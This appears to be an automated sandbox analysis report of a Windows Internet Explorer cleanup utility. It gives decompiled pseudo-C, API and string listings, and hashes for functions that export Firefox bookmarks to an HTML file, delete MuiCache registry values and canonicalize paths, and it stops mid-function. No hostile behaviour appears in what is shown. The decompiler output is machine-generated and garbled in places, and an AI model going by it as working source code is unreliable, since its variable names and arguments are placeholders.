Instruction Fuzzy Hash: 8FC04C74416BC09DEF115760FD5871D3E50675170BFA800BCD050595B2C3B80044A71D

Uniqueness

Uniqueness Score: -1.00%

Function 00C8389C, Relevance: 59.6, APIs: 18, Strings: 16, Instructions: 142COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,?,00000104,750A4D40,00000000), ref: 00C838CE
PathFindFileNameW.SHLWAPI(?), ref: 00C838E3
StrCmpICW.SHLWAPI(00000000,IEXPLORE.EXE), ref: 00C838F7
StrCmpICW.SHLWAPI(00000000,MSFEEDSSYNC.EXE), ref: 00C83909

Strings

Te.ProcessHost.exe, xrefs: 00C83973
IEUTLAUNCH.EXE, xrefs: 00C83957
MSFEEDSSYNC.EXE, xrefs: 00C83903
IEXPLORE.EXE, xrefs: 00C838F1
LOADER42.EXE, xrefs: 00C83937
WWAHOST.EXE, xrefs: 00C83947
USERACCOUNTBROKER.EXE, xrefs: 00C839B1
RESTOREOPTIN.EXE, xrefs: 00C839EA
MSHTMPAD.EXE, xrefs: 00C839C4
FAKEVIRTUALSURFACETESTAPP.EXE, xrefs: 00C8397F
SYSPREP.EXE, xrefs: 00C83917
EXPLORER.EXE, xrefs: 00C83927
NETPLWIZ.EXE, xrefs: 00C8399E
TE.EXE, xrefs: 00C83967
FirstLogonAnim.exe, xrefs: 00C839D7
MSOOBE.EXE, xrefs: 00C8398B

Memory Dump Source

Source File: 00000005.00000002.2089471781.0000000000C81000.00000020.00020000.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000005.00000002.2089460296.0000000000C80000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.2089487211.0000000000C87000.00000002.00020000.sdmp Download File

Similarity

API ID: FileName$FindModulePath
String ID: EXPLORER.EXE$FAKEVIRTUALSURFACETESTAPP.EXE$FirstLogonAnim.exe$IEUTLAUNCH.EXE$IEXPLORE.EXE$LOADER42.EXE$MSFEEDSSYNC.EXE$MSHTMPAD.EXE$MSOOBE.EXE$NETPLWIZ.EXE$RESTOREOPTIN.EXE$SYSPREP.EXE$TE.EXE$Te.ProcessHost.exe$USERACCOUNTBROKER.EXE$WWAHOST.EXE
API String ID: 1618668439-1412893414
Opcode ID: 2a119dfc68961e7c5bfec4a2329da1b898b16fce19eac7c93643b609b5e92522
Instruction ID: 6da1dc9ea767c2099cd9e5ba5d703361639e1d4b168b1078d4ddc6e52ac3a2e2
Opcode Fuzzy Hash: 2a119dfc68961e7c5bfec4a2329da1b898b16fce19eac7c93643b609b5e92522
Instruction Fuzzy Hash: 5031AD7138979AB1EA11766A4C42FAF228C4F51F8CF151221FA21F10D1FBD9CB02576E

Uniqueness

Uniqueness Score: -1.00%

Function 00C82D9C, Relevance: 22.9, APIs: 4, Strings: 9, Instructions: 172
stringCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E00C82D9C(char* __ecx, void* __edx, long long __fp0) {
				signed int _v8;
				char _v32;
				char _v2060;
				char _v4108;
				long long _v4112;
				signed int _v4116;
				WCHAR* _v4120;
				char _v4124;
				intOrPtr _v4128;
				char _v4132;
				intOrPtr _v4140;
				intOrPtr _v4144;
				intOrPtr _v4148;
				char _v4172;
				WCHAR* _v4180;
				WCHAR* _v4184;
				WCHAR* _v4188;
				char _v4212;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t57;
				void* _t63;
				void* _t65;
				void* _t72;
				void* _t82;
				char* _t89;
				void* _t90;
				char* _t98;
				void* _t104;
				void* _t105;
				WCHAR* _t107;
				void* _t108;
				WCHAR* _t109;
				signed int _t110;
				signed int _t111;
				long long* _t112;
				void* _t113;
				long long* _t114;
				long long _t130;
				long long _t131;

				_t130 = __fp0;
				_t102 = __edx;
				_t91 = __ecx;
				E00C850C0(0x1074);
				_v8 =  *0xc86004 ^ _t111;
				 *0xc8638c =  *0xc8638c + 1;
				_t107 = 0;
				_t89 = __ecx;
				_v4124 = 0;
				_v4120 = 0;
				if(E00C8295F() == 0) {
					L16:
					_v4132 = _t107;
					_v4128 = _t107;
					if(E00C8295F() == 0) {
						L22:
						 *0xc8638c =  *0xc8638c - 1;
						E00C827B8( &_v4132, _t128);
						_t57 = E00C827B8( &_v4124, _t128);
						_pop(_t104);
						_pop(_t108);
						_pop(_t90);
						return E00C84AAD(_t57, _t90, _v8 ^ _t111, _t102, _t104, _t108);
					}
					E00C82225( &_v4108, 0x400, L"select b.id, b.title, p.url, b.dateAdded, b.lastModified, i.url from moz_bookmarks as b, moz_places as p left outer join moz_favicons as i on p.favicon_id=i.id where b.fk=p.id and b.parent=%d", _t89);
					_t113 = _t112 + 0x10;
					_t63 = E00C82B5D(_t91,  &_v4108,  &_v4132);
					_t127 = _t63;
					if(_t63 < 0) {
						goto L22;
					}
					_v4148 = _t107;
					_v4144 = _t107;
					_v4140 = _t107;
					while(1) {
						_t65 = E00C82809( &_v4132, _t102, _t127,  &_v4172);
						_t128 = _t65;
						if(_t65 < 0) {
							break;
						}
						_push(_v4148);
						asm("fild qword [ebp-0x1038]");
						_push(_v4140);
						_v4112 = _t130;
						_t131 = _v4112;
						_t114 = _t113 - 0x10;
						_v32 = _t131;
						asm("fild qword [ebp-0x1040]");
						_v4112 = _t131;
						_t130 = _v4112;
						 *_t114 = _t130;
						E00C82CD4(L"<DT><A HREF=\"%s\" ADD_DATE=\"%.0f\" LAST_MODIFIED=\"%.0f\" ICON_URI=\"%s\">%s</A>", _v4144);
						_t113 = _t114 + 0x20;
					}
					E00C82BEB( &_v4172);
					goto L22;
				}
				E00C82225( &_v2060, 0x400, L"select b.id, b.title, b.dateAdded, b.lastModified from moz_bookmarks as b where b.type=2 and b.parent=%d", __ecx);
				_t112 = _t112 + 0x10;
				_t72 = E00C82B5D(_t91,  &_v2060,  &_v4124);
				_t116 = _t72;
				if(_t72 < 0) {
					goto L16;
				}
				_v4188 = 0;
				_t98 =  &_v4124;
				_v4184 = 0;
				_v4180 = 0;
				if(E00C828D3(_t98, __edx, _t116,  &_v4212) < 0) {
					L15:
					_t91 =  &_v4212;
					E00C82BEB( &_v4212);
					goto L16;
				} else {
					_t105 = lstrcmpW;
					do {
						_t109 = _v4188;
						if(_t89 != 1 || lstrcmpW(_t109, L"Tags") != 0 && lstrcmpW(_t109, 0xc81744) != 0) {
							if(lstrcmpW(_t109, L"Smart Bookmarks") != 0) {
								_v4116 = _v4116 & 0x00000000;
								_t82 = E00C82A22(_t98, _t105, _v4212,  &_v4116);
								asm("fild qword [ebp-0x1068]");
								_push(_t109);
								if(_t82 != 0) {
									_push(_v4116);
									_v4112 = _t130;
									_t130 = _v4112;
									_t110 = _v4116;
									_push(_t98);
									_push(_t98);
									_v32 = _t130;
									E00C82CD4(L"<DT><A HREF=\"%s\" ADD_DATE=\"%.0f\" FEEDURL=\"%s\">%s</A>", _t110);
									_t112 = _t112 + 0x18;
								} else {
									_v4112 = _t130;
									_t130 = _v4112;
									 *_t112 = _t130;
									E00C82CD4(L"<DT><H3 FOLDED ADD_DATE=\"%.0f\">%s</H3>", _t98);
									E00C82CD4(L"<DL><p>", _t98);
									_t112 = _t112 + 0x14;
									E00C82D9C(_v4212, _t102, _t130);
									_push(L"</DL><p>");
									E00C82CD4();
									_t110 = _v4116;
								}
								_t123 = _t110;
								if(_t110 != 0) {
									__imp__??3@YAXPAX@Z(_t110);
								}
							}
						}
						_t98 =  &_v4124;
					} while (E00C828D3(_t98, _t102, _t123,  &_v4212) >= 0);
					_t107 = 0;
					goto L15;
				}
			}

0x00c82d9c
0x00c82d9c
0x00c82d9c
0x00c82da6
0x00c82db2
0x00c82db5
0x00c82dbd
0x00c82dbf
0x00c82dc2
0x00c82dc8
0x00c82dd5
0x00c82f45
0x00c82f45
0x00c82f4b
0x00c82f58
0x00c83015
0x00c83015
0x00c83021
0x00c8302c
0x00c83034
0x00c83035
0x00c83038
0x00c83041
0x00c83041
0x00c82f70
0x00c82f75
0x00c82f86
0x00c82f8b
0x00c82f8d
0x00000000
0x00000000
0x00c82f93
0x00c82f99
0x00c82f9f
0x00c82ff4
0x00c83001
0x00c83006
0x00c83008
0x00000000
0x00000000
0x00c82fa7
0x00c82fad
0x00c82fb3
0x00c82fb9
0x00c82fbf
0x00c82fc5
0x00c82fc8
0x00c82fcc
0x00c82fd2
0x00c82fd8
0x00c82fde
0x00c82fec
0x00c82ff1
0x00c82ff1
0x00c83010
0x00000000
0x00c83010
0x00c82ded
0x00c82df2
0x00c82e03
0x00c82e08
0x00c82e0a
0x00000000
0x00000000
0x00c82e16
0x00c82e1d
0x00c82e23
0x00c82e29
0x00c82e36
0x00c82f3a
0x00c82f3a
0x00c82f40
0x00000000
0x00c82e3c
0x00c82e3c
0x00c82e42
0x00c82e42
0x00c82e4b
0x00c82e77
0x00c82e7d
0x00c82e91
0x00c82e96
0x00c82e9c
0x00c82e9f
0x00c82ee7
0x00c82eed
0x00c82ef3
0x00c82ef9
0x00c82eff
0x00c82f00
0x00c82f01
0x00c82f0a
0x00c82f0f
0x00c82ea1
0x00c82ea2
0x00c82ea8
0x00c82eaf
0x00c82eb7
0x00c82ec1
0x00c82ecc
0x00c82ecf
0x00c82ed4
0x00c82ed9
0x00c82ede
0x00c82ee4
0x00c82f12
0x00c82f14
0x00c82f17
0x00c82f1d
0x00c82f14
0x00c82e77
0x00c82f25
0x00c82f30
0x00c82f38
0x00000000
0x00c82f38

APIs

Part of subcall function 00C82225: _vsnwprintf.MSVCRT ref: 00C82257

lstrcmpW.KERNEL32(?,Tags,?,?), ref: 00C82E53
lstrcmpW.KERNEL32(?,00C81744), ref: 00C82E63

Part of subcall function 00C82CD4: WriteFile.KERNEL32(00C81748,00000002,?,00000000), ref: 00C82D1B
Part of subcall function 00C82CD4: WriteFile.KERNEL32(?,?,?,00000000), ref: 00C82D6D
Part of subcall function 00C82CD4: WriteFile.KERNEL32(00C8174C,00000004,?,00000000), ref: 00C82D84

lstrcmpW.KERNEL32(?,Smart Bookmarks,?,?), ref: 00C82E73
??3@YAXPAX@Z.MSVCRT ref: 00C82F17

Strings

Smart Bookmarks, xrefs: 00C82E6D
<DT><A HREF="%s" ADD_DATE="%.0f" LAST_MODIFIED="%.0f" ICON_URI="%s">%s</A>, xrefs: 00C82FE7
select b.id, b.title, p.url, b.dateAdded, b.lastModified, i.url from moz_bookmarks as b, moz_places as p left outer join moz_favic, xrefs: 00C82F5F
<DL><p>, xrefs: 00C82EBC
select b.id, b.title, b.dateAdded, b.lastModified from moz_bookmarks as b where b.type=2 and b.parent=%d, xrefs: 00C82DDC
<DT><A HREF="%s" ADD_DATE="%.0f" FEEDURL="%s">%s</A>, xrefs: 00C82F05
Tags, xrefs: 00C82E4D
</DL><p>, xrefs: 00C82ED4
<DT><H3 FOLDED ADD_DATE="%.0f">%s</H3>, xrefs: 00C82EB2

Memory Dump Source

Source File: 00000005.00000002.2089471781.0000000000C81000.00000020.00020000.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000005.00000002.2089460296.0000000000C80000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.2089487211.0000000000C87000.00000002.00020000.sdmp Download File

Similarity

API ID: FileWritelstrcmp$??3@_vsnwprintf
String ID: </DL><p>$<DL><p>$<DT><A HREF="%s" ADD_DATE="%.0f" FEEDURL="%s">%s</A>$<DT><A HREF="%s" ADD_DATE="%.0f" LAST_MODIFIED="%.0f" ICON_URI="%s">%s</A>$<DT><H3 FOLDED ADD_DATE="%.0f">%s</H3>$Smart Bookmarks$Tags$select b.id, b.title, b.dateAdded, b.lastModified from moz_bookmarks as b where b.type=2 and b.parent=%d$select b.id, b.title, p.url, b.dateAdded, b.lastModified, i.url from moz_bookmarks as b, moz_places as p left outer join moz_favic
API String ID: 1448721381-3632509114
Opcode ID: 4b91553638ec7f44f601b6bb29a4f63d69f1f536827ad64d78190aceb77918ca
Instruction ID: 184fbf7375d84c3550d44e0a1b372d13d76f38e827a38a3b7b38c623c095596e
Opcode Fuzzy Hash: 4b91553638ec7f44f601b6bb29a4f63d69f1f536827ad64d78190aceb77918ca
Instruction Fuzzy Hash: DE518171D001B8AADB21BB50CD49AEEB778EF08748F4041D6F589A2045DBB05FD5DF68

Uniqueness

Uniqueness Score: -1.00%

Function 00C83047, Relevance: 21.1, APIs: 4, Strings: 8, Instructions: 112
filelibraryCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E00C83047(WCHAR* __ecx, void* __edx, void* __fp0) {
				signed int _v8;
				char _v532;
				intOrPtr _v540;
				char _v544;
				intOrPtr _v548;
				char _v572;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t14;
				void* _t16;
				void* _t34;
				void* _t42;
				struct HINSTANCE__* _t43;
				char* _t51;
				char* _t53;
				void* _t54;
				void* _t56;
				void* _t57;
				void* _t60;
				signed int _t62;
				signed int _t64;

				_t68 = __fp0;
				_t54 = __edx;
				_t64 = (_t62 & 0xfffffff8) - 0x23c;
				_v8 =  *0xc86004 ^ _t64;
				_t56 = 0;
				if(E00C8295F() == 0) {
					L9:
					_t14 = _t56;
					L10:
					_pop(_t57);
					_pop(_t60);
					_pop(_t42);
					return E00C84AAD(_t14, _t42, _v8 ^ _t64, _t54, _t57, _t60);
				}
				_t16 = CreateFileW(__ecx, 0x40000000, 0, 0, 2, 0x80, 0);
				 *0xc8600c = _t16;
				if(_t16 != 0xffffffff) {
					_push(L"<!DOCTYPE NETSCAPE-Bookmark-file-");
					E00C82C23(0);
					 *_t64 = L"1>";
					E00C82CD4();
					 *_t64 = L"<!-- This is an automatically generated file.\r\nIt will be read and overwritten.\r\nDo Not Edit! -->";
					E00C82CD4();
					 *_t64 = L"<TITLE>Bookmarks</TITLE>\r\n<H1>Bookmarks</H1>";
					E00C82CD4();
					 *_t64 = L"<DL><p>";
					E00C82CD4();
					_t48 = 2;
					E00C82D9C(_t48, _t54, __fp0);
					_t43 = LoadLibraryExW(L"ieframe.dll", 0, 0x60);
					if(_t43 != 0) {
						_t64 = _t64 - 0xc;
						_t48 = _t43;
						_t34 = E00C832EB(_t43, _t54,  &_v532);
						FreeLibrary(_t43);
						if(_t34 >= 0) {
							E00C82CD4(L"<DT><H3 FOLDED>%s</H3>",  &_v544);
							_push(L"<DL><p>");
							E00C82CD4();
							_t64 = _t64 + 0xc;
							_t53 = 3;
							E00C82D9C(_t53, _t54, __fp0);
							_push(L"</DL><p>");
							E00C82CD4();
							_pop(_t48);
						}
					}
					_v548 = _t56;
					_v544 = _t56;
					_v540 = _t56;
					if(E00C82986(_t43, _t48, _t54, _t48,  &_v572) >= 0) {
						E00C82CD4(L"<DT><H3 FOLDED>%s</H3>", _v548);
						_push(L"<DL><p>");
						E00C82CD4();
						_t64 = _t64 + 0xc;
						_t51 = 5;
						E00C82D9C(_t51, _t54, _t68);
						_push(L"</DL><p>");
						E00C82CD4();
					}
					_push(L"</DL><p>");
					E00C82CD4();
					CloseHandle( *0xc8600c);
					_t56 = 1;
					E00C82BEB( &_v572);
					goto L9;
				}
				_t14 = 0;
				goto L10;
			}

0x00c83047
0x00c83047
0x00c8304f
0x00c8305c
0x00c83066
0x00c8306f
0x00c831aa
0x00c831aa
0x00c831ac
0x00c831b3
0x00c831b4
0x00c831b5
0x00c831c0
0x00c831c0
0x00c83085
0x00c8308b
0x00c83093
0x00c8309c
0x00c830a1
0x00c830a6
0x00c830ad
0x00c830b2
0x00c830b9
0x00c830be
0x00c830c5
0x00c830ca
0x00c830d1
0x00c830d9
0x00c830da
0x00c830ed
0x00c830f1
0x00c830f3
0x00c830fa
0x00c830fd
0x00c83105
0x00c8310d
0x00c83119
0x00c8311e
0x00c83123
0x00c83128
0x00c8312d
0x00c8312e
0x00c83133
0x00c83138
0x00c8313d
0x00c8313d
0x00c8310d
0x00c83142
0x00c83148
0x00c8314c
0x00c83157
0x00c83162
0x00c83167
0x00c8316c
0x00c83171
0x00c83176
0x00c83177
0x00c8317c
0x00c83181
0x00c83186
0x00c83187
0x00c8318c
0x00c83198
0x00c831a4
0x00c831a5
0x00000000
0x00c831a5
0x00c83095
0x00000000

APIs

CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00C83085
LoadLibraryExW.KERNEL32(ieframe.dll,00000000,00000060,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00C830E7
FreeLibrary.KERNEL32(00000000,?), ref: 00C83105
CloseHandle.KERNEL32 ref: 00C83198

Strings

<!DOCTYPE NETSCAPE-Bookmark-file-, xrefs: 00C8309C
, xrefs: 00C830B2
<DL><p>, xrefs: 00C830CA, 00C8311E, 00C83167
</DL><p>, xrefs: 00C83187
<TITLE>Bookmarks</TITLE><H1>Bookmarks</H1>, xrefs: 00C830BE
ieframe.dll, xrefs: 00C830E2
</DL><p>, xrefs: 00C83133, 00C83147, 00C8317C
<DT><H3 FOLDED>%s</H3>, xrefs: 00C83114, 00C8315D

Memory Dump Source

Source File: 00000005.00000002.2089471781.0000000000C81000.00000020.00020000.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000005.00000002.2089460296.0000000000C80000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.2089487211.0000000000C87000.00000002.00020000.sdmp Download File

Similarity

API ID: Library$CloseCreateFileFreeHandleLoad
String ID: $<!DOCTYPE NETSCAPE-Bookmark-file-$</DL><p>$</DL><p>$<DL><p>$<DT><H3 FOLDED>%s</H3>$<TITLE>Bookmarks</TITLE><H1>Bookmarks</H1>$ieframe.dll
API String ID: 3702922737-715636854
Opcode ID: 2fb1c8ad2b033c4fba9847b4579b262c44e8501826eda030e0218fe198a107aa
Instruction ID: c2c138fa1eeaaf3c8429f3011b2725276a0024ce6ad4e5abc726405041605752
Opcode Fuzzy Hash: 2fb1c8ad2b033c4fba9847b4579b262c44e8501826eda030e0218fe198a107aa
Instruction Fuzzy Hash: 1B31F2716083406AE2247B719C4FB6F7BE89B80B6DF18052DFA50961C2DF749581E72E

Uniqueness

Uniqueness Score: -1.00%

Function 00C832EB, Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 86COMMON

Download Yara Rule

APIs

SHGetFolderPathAndSubDirW.SHELL32(00000000,00000006,00000000,00000000,Links,?), ref: 00C83325
#672.IERTUTIL(?,00000000), ref: 00C83333
#675.IERTUTIL(?,00000000), ref: 00C83365
SHSetLocalizedName.SHELL32(?,%windir%\System32\ieframe.dll,00003061), ref: 00C83354

Part of subcall function 00C83772: RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00020006,?,00000000,00C83102), ref: 00C837B8
Part of subcall function 00C83772: RegDeleteValueW.ADVAPI32(?,?), ref: 00C837DB
Part of subcall function 00C83772: RegDeleteValueW.ADVAPI32(?,?), ref: 00C83838
Part of subcall function 00C83772: RegCloseKey.ADVAPI32(?), ref: 00C83875

#672.IERTUTIL(?,00000000), ref: 00C83377
#675.IERTUTIL(?,00000000), ref: 00C83398
SHGetFolderPathAndSubDirW.SHELL32(00000000,00008006,00000000,00000000,Links,?), ref: 00C833B2
SHSetLocalizedName.SHELL32(?,%windir%\System32\ieframe.dll,00003061), ref: 00C833CB

Strings

%windir%\System32\ieframe.dll, xrefs: 00C83348, 00C833BF
Links, xrefs: 00C83313, 00C833A3, 00C833DA

Memory Dump Source

Source File: 00000005.00000002.2089471781.0000000000C81000.00000020.00020000.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000005.00000002.2089460296.0000000000C80000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.2089487211.0000000000C87000.00000002.00020000.sdmp Download File

Similarity

API ID: #672#675DeleteFolderLocalizedNamePathValue$CloseOpen
String ID: %windir%\System32\ieframe.dll$Links
API String ID: 4100310970-3729751556
Opcode ID: f7186830c7c442b34818137961a6ae7b94b33caba260616a79d8f8cbdd3ae2ed
Instruction ID: 6249d2b6f70686ea92a834d316ee7b5d1df54980e340835bd307cafc7fbafb3b
Opcode Fuzzy Hash: f7186830c7c442b34818137961a6ae7b94b33caba260616a79d8f8cbdd3ae2ed
Instruction Fuzzy Hash: 7A21A3B1A002186BDB20BB25DC89F6E77ADEB40B14F100561F915E71A1EBB0DF459B58

Uniqueness

Uniqueness Score: -1.00%

Function 00C83772, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 84
registryCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E00C83772(short* __edx, void* __edi) {
				signed int _v8;
				short _v528;
				void* _v532;
				void* __ebx;
				void* __esi;
				long _t31;
				long _t36;
				void* _t46;
				int _t47;
				signed int _t48;
				void* _t49;

				_t45 = __edi;
				_t44 = __edx;
				_v8 =  *0xc86004 ^ _t48;
				_push(L"[IECleanup LIB] CleanupMuiCache()");
				_push(0);
				E00C83A1B(0, __edx, __edi, _t46);
				_t47 = 0;
				do {
					_v532 = 0;
					if(RegOpenKeyExW(0x80000001,  *(_t47 + 0xc86010), 0, 0x20006,  &_v532) != 0) {
						goto L11;
					}
					if(( *(_t47 + 0xc86018) & 0x00000001) != 0) {
						_t36 = RegDeleteValueW(_v532,  *(_t47 + 0xc86014));
						if(_t36 != 0) {
							_push(_t36);
							E00C83A1B(0, _t44, _t45, _t47, 0, L"[IECleanup LIB] CleanupMuiCache() - Unable to delete \'%s\', Result=%d",  *(_t47 + 0xc86014));
							_t49 = _t49 + 0x10;
						} else {
							E00C83A1B(0, _t44, _t45, _t47, 0, L"[IECleanup LIB] CleanupMuiCache() - Successfully deleted \'%s\'",  *(_t47 + 0xc86014));
							_t49 = _t49 + 0xc;
						}
					}
					if(( *(_t47 + 0xc86018) & 0x00000002) != 0) {
						_t44 =  &_v528;
						E00C8479B( *(_t47 + 0xc86014),  &_v528,  *(_t47 + 0xc86014));
						_t31 = RegDeleteValueW(_v532,  &_v528);
						if(_t31 != 0) {
							_push(_t31);
							E00C83A1B(0,  &_v528, _t45, _t47, 0, L"[IECleanup LIB] CleanupMuiCache() - Unable to delete \'%s\', Result=%d",  &_v528);
							_t49 = _t49 + 0x10;
						} else {
							E00C83A1B(0,  &_v528, _t45, _t47, 0, L"[IECleanup LIB] CleanupMuiCache() - Successfully deleted \'%s\'",  &_v528);
							_t49 = _t49 + 0xc;
						}
					}
					_t27 = RegCloseKey(_v532);
					L11:
					_t47 = _t47 + 0xc;
				} while (_t47 < 0x24);
				return E00C84AAD(_t27, 0, _v8 ^ _t48, _t44, _t45, _t47);
			}

0x00c83772
0x00c83772
0x00c83784
0x00c8378b
0x00c83790
0x00c83791
0x00c83798
0x00c8379a
0x00c837a0
0x00c837c0
0x00000000
0x00000000
0x00c837cd
0x00c837db
0x00c837e3
0x00c837fb
0x00c83808
0x00c8380d
0x00c837e5
0x00c837f1
0x00c837f6
0x00c837f6
0x00c837e3
0x00c83817
0x00c83820
0x00c83826
0x00c83838
0x00c83840
0x00c83859
0x00c83867
0x00c8386c
0x00c83842
0x00c8384f
0x00c83854
0x00c83854
0x00c83840
0x00c83875
0x00c8387b
0x00c8387b
0x00c8387e
0x00c83896

APIs

Part of subcall function 00C83A1B: DecodePointer.KERNEL32 ref: 00C83A83

RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00020006,?,00000000,00C83102), ref: 00C837B8
RegDeleteValueW.ADVAPI32(?,?), ref: 00C837DB
RegDeleteValueW.ADVAPI32(?,?), ref: 00C83838
RegCloseKey.ADVAPI32(?), ref: 00C83875

Strings

[IECleanup LIB] CleanupMuiCache(), xrefs: 00C8378B
[IECleanup LIB] CleanupMuiCache() - Successfully deleted '%s', xrefs: 00C837EB, 00C83849
[IECleanup LIB] CleanupMuiCache() - Unable to delete '%s', Result=%d, xrefs: 00C83802, 00C83861

Memory Dump Source

Source File: 00000005.00000002.2089471781.0000000000C81000.00000020.00020000.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000005.00000002.2089460296.0000000000C80000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.2089487211.0000000000C87000.00000002.00020000.sdmp Download File

Similarity

API ID: DeleteValue$CloseDecodeOpenPointer
String ID: [IECleanup LIB] CleanupMuiCache()$[IECleanup LIB] CleanupMuiCache() - Successfully deleted '%s'$[IECleanup LIB] CleanupMuiCache() - Unable to delete '%s', Result=%d
API String ID: 2742595093-2876198904
Opcode ID: a141a1721057b69c26716bdceb0fe6736bfff6aff63191486d6aabc5b144e886
Instruction ID: 690001231b25481a291775e9747aebc77dfe388a7f4a562b3822056815fee05a
Opcode Fuzzy Hash: a141a1721057b69c26716bdceb0fe6736bfff6aff63191486d6aabc5b144e886
Instruction Fuzzy Hash: 8721E7B1500358AAD7217B608C89FEE77ADEB00708F101DA9FD6B61092E7719F50AB5C

Uniqueness

Uniqueness Score: -1.00%

Function 00C84083, Relevance: 9.1, APIs: 3, Strings: 2, Instructions: 330
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E00C84083(wchar_t* __ecx, void* __eflags, wchar_t* _a4) {
				short _v8;
				void* _v12;
				void* _v16;
				signed int _v20;
				intOrPtr* _v24;
				intOrPtr _v28;
				short _t81;
				intOrPtr _t89;
				intOrPtr* _t90;
				long _t91;
				void* _t93;
				intOrPtr* _t99;
				long _t102;
				intOrPtr _t105;
				short _t107;
				void* _t108;
				signed int _t109;
				void* _t111;
				void* _t112;
				void* _t118;
				void* _t119;
				intOrPtr _t122;
				long* _t123;
				void* _t126;
				intOrPtr _t129;
				wchar_t* _t132;
				intOrPtr _t134;
				wchar_t* _t137;
				long _t141;
				wchar_t* _t142;
				long _t145;
				wchar_t* _t150;
				signed int _t151;
				signed int _t152;
				signed int _t154;
				long* _t167;
				void* _t169;
				wchar_t* _t170;
				intOrPtr _t172;
				wchar_t* _t178;
				wchar_t* _t180;
				void* _t181;
				short* _t182;
				intOrPtr _t183;
				long* _t184;
				intOrPtr* _t185;
				void* _t186;
				short* _t187;

				_t178 = __ecx;
				_t81 = E00C83AA8(__ecx, 0x104, 0xc81744);
				_v8 = _t81;
				if(_t81 < 0) {
					return _t81;
				}
				_t132 = _a4;
				_t137 = _t132;
				_v16 = 0x104;
				_v12 = 0x104;
				if(E00C83CA0(_t137,  &_v20) == 0) {
					_t180 = _t178;
					_a4 = _t180;
					if(E00C846C3(_t132, L"\\\\?\\", 4) == 0) {
						iswalpha( *_t132 & 0x0000ffff);
					} else {
						_t123 =  &(_t132[2]);
						_v20 = _t123;
						if(iswalpha( *_t123 & 0x0000ffff) != 0) {
							_t126 = 0x3a;
							if(_t132[2] == _t126) {
								_t132 = _v20;
							}
						}
					}
				} else {
					_push(_t137);
					_t129 = E00C83AE7(_t178, 0x104, L"\\\\",  &_a4,  &_v12);
					_t132 = _v20;
					_t180 = _a4;
					_v8 = _t129;
					_v16 = _v12;
				}
				if(_v8 < 0) {
					L64:
					E00C83AA8(_t178, 0x104, 0xc81744);
					_t89 = _v8;
					if(_t89 == 0x8007007a) {
						_t89 = _t89 + 0x54;
					}
					L66:
					return _t89;
				}
				_t90 = 0;
				_v24 = 0;
				while(1) {
					_t141 = 0x5c;
					if( *_t132 == _t90) {
						break;
					}
					_t170 = wcschr(_t132, _t141);
					_v28 = _t170;
					if(_t170 == 0) {
						_t150 = _t132;
						_v20 =  &(_t150[0]);
						do {
							_t102 =  *_t150;
							_t150 =  &(_t150[0]);
						} while (_t102 != _v24);
						_t151 = _t150 - _v20;
						L16:
						_t152 = _t151 >> 1;
						_v20 = _t152;
						if(_t152 > 0x100 || _t152 >= 0x8000) {
							_v8 = 0x800700ce;
							goto L64;
						} else {
							if(_t152 != 1) {
								if(_t152 != 2) {
									if(_t152 == 0) {
										_t111 = 0x5c;
										if( *_t132 == _t111) {
											_t152 = _t152 + 1;
											_v20 = _t152;
										}
									}
									L49:
									_push(_t152);
									_t105 = E00C83B87(_t180, _v16, _t132, _t152,  &_a4,  &_v12);
									_t154 = _v20;
									_t183 = _t105;
									_v8 = _t183;
									if(_t183 != 0x8007007a || _t154 != 1) {
										L59:
										_v16 = _v12;
										goto L60;
									} else {
										_t108 = 0x5c;
										if( *_t132 != _t108) {
											goto L59;
										}
										_t109 = _t132[0] & 0x0000ffff;
										if(_t109 == 0) {
											L62:
											_t180 = _a4;
											_t134 = 0;
											_v8 = 0;
											L69:
											if(_t134 < 0) {
												goto L64;
											}
											if(_t180 <= _t178) {
												L77:
												_t142 = _t178;
												_t167 =  &(_t142[0]);
												do {
													_t91 =  *_t142;
													_t142 =  &(_t142[0]);
												} while (_t91 != 0);
												_t181 = _t178 + (_t142 - _t167 >> 1) * 2;
												if(_t181 >=  &(_t178[3]) && E00C846C3(_t181 - 0xe, L"::$DATA", 7) != 0) {
													 *((short*)(_t181 - 0xe)) = 0;
												}
												_t145 = 0x5c;
												if( *_t178 == 0) {
													 *_t178 = _t145;
													_t178[0] = 0;
												}
												_t93 = 0x3a;
												if(_t178[0] == _t93 && _t178[1] == 0) {
													_t178[1] = _t145;
													_t178[1] = 0;
												}
												_t89 = 0;
												goto L66;
											}
											_t182 = _t180 - 2;
											_t169 = 0x2e;
											if( *_t182 != _t169) {
												goto L77;
											}
											while(_t182 != _t178) {
												_t99 = _t182 - 2;
												if( *_t99 == 0x2a) {
													goto L77;
												}
												 *_t182 = 0;
												_t182 = _t99;
												if( *_t99 == _t169) {
													continue;
												}
												goto L77;
											}
											 *_t182 = 0;
											goto L77;
										}
										_t186 = 0x2e;
										if(_t109 != _t186 || _t132[1] != 0) {
											_t172 = _v12;
											_v16 = _t172;
											if(_t172 != 1 || _t109 != _t186 || _t132[1] != _t186) {
												L60:
												_t107 = _v8;
												_t180 = _a4;
												goto L61;
											} else {
												_t187 = _a4;
												_t107 = 0;
												_v8 = 0;
												_v16 = 0;
												_v12 = 0;
												 *_t187 = 0;
												_t180 = _t187 + 2;
												_a4 = _t180;
												L61:
												_t132 = _t132 + _t154 * 2;
												L23:
												if(_t107 < 0) {
													goto L64;
												}
